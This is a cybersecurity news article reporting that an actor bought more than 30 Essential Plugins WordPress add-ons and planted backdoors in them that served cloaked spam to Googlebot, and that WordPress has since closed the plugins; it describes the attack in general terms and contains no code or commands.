WordPress plugins taken offline after a developer found 30 injected with malicious code

Published: 15 April 2026
WordPress hacking
By Cybernews

Dozens of WordPress plugins have been compromised by an unknown actor who planted backdoors in popular add-ons after buying them for hundreds of thousands of dollars.

WordPress developer and founder of Anchor Hosting, Austin Ginder, identified a supply chain attack affecting the popular content management system’s plug-ins.

Essential Plugins, a plugin maker with over 400,000 plugins, was bought, and backdoors were soon added to popular WordPress plugins.

ADVERTISEMENT

WordPress has over 62,000 free plugins, which are used by millions of people who host their blogs or online media on the content management system.

Ginder found that more than 30 plugins had been purchased by a person named “Kris,” who claimed a background in SEO, online gambling, and cryptocurrency.

The user bought these unidentified plugins for six figures via the private marketplace Flippa.

While all seemed quiet, these plugins were harboring a dark secret that would come to light eight months later.

This investigation was started when WordPress announced that a plug-in called “Countdown Timer Ultimate” contained malicious code that could allow third parties to exploit it.

The notice prompted Ginder to take a look at more of Essential Plugin’s WordPress add-ons.

What Ginder found was that many of these WordPress plug-ins had been injected with sophisticated code that fetched spam links, redirects, and fake pages from a common-and control server, Ginder said.

The behavior of these compromised WordPress plug-ins wasn’t visible to users and was only visible to Googlebot.

ADVERTISEMENT

This scheme was particularly sophisticated, as the bad actor’s domain was routed through an Ethereum smart contract.

The bad actor was capable of injecting plug-ins with malware that was only identifiable by Google, while also making it difficult for authorities to block the domain by using an Ethereum smart contract.

“Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time,” Ginder explained.

Earlier this month, WordPress’s Plugins Team officially closed every plugin from the company Essential Plugins.

This included at least 30 plugins, which Ginder fully lists in his blog post.

jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News. Add us as your Preferred Source on Google
Follow us

Unlock more exclusive Cybernews content on YouTube.

ADVERTISEMENT
Share
Post
Share
Share
Share
More from Cybernews
Companies using Fable 5 beware: it’s collecting your data, and there are no exceptions
World’s leading mathematicians ridicule AI hype in high-IQ declaration
Democrats are far more worried than Republicans that AI will take jobs, new poll finds
Europe’s tech revolution feels like Soviet déjà vu
New York demands advertisers use “synthetic performer” label or else
The surprising way Elon Musk is powering your next holiday flight
ADVERTISEMENT
Leave a Reply

Your email address will not be published. Required fields are markedmarked